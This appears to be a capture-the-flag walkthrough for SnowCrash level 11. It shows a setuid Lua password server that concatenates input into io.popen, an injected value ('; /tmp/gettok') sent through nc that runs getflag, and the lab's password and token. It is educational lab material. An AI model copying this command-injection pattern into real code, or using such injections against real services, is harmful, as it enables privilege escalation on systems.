# Level 11 ## how to login username: level11 password: feulo4b72j7edeahuete3no7c ## Goal run `getflag` as user `flag11` ## Actually doing something ```bash level11@SnowCrash:~$ ll total 16 dr-xr-x---+ 1 level11 level11 120 Mar 5 2016 ./ d--x--x--x 1 root users 340 Aug 30 2015 ../ -r-x------ 1 level11 level11 220 Apr 3 2012 .bash_logout* -r-x------ 1 level11 level11 3518 Aug 30 2015 .bashrc* -rwsr-sr-x 1 flag11 level11 668 Mar 5 2016 level11.lua* -r-x------ 1 level11 level11 675 Apr 3 2012 .profile* ``` a setuid script ? something seems fishy, lets open it ```lua #!/usr/bin/env lua local socket = require("socket") local server = assert(socket.bind("127.0.0.1", 5151)) function hash(pass) prog = io.popen("echo "..pass.." | sha1sum", "r") data = prog:read("*all") prog:close() data = string.sub(data, 1, 40) return data end while 1 do local client = server:accept() client:send("Password: ") client:settimeout(60) local l, err = client:receive() if not err then print("trying " .. l) local h = hash(l) if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then client:send("Erf nope..\n"); else client:send("Gz you dumb*\n") end end client:close() end ``` it seems to be a server that ask for a password, check that the password is correct and does something ? Lookit at the `hash` function, we do see a nice little shell injection oportunity, lets try something :D we want to have something that write the getflag somewhere like we did before. what about the same script: ```bash level11@SnowCrash:~$ cat </tmp/gettok #!/bin/sh getflag >/tmp/flag chmod 777 /tmp/flag EOF level11@SnowCrash:~$ chmod +x /tmp/gettok level11@SnowCrash:~$ echo "; /tmp/gettok" | nc localhost 5151 Password: Erf nope.. level11@SnowCrash:~$ cat /tmp/flag Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s ``` and voila :D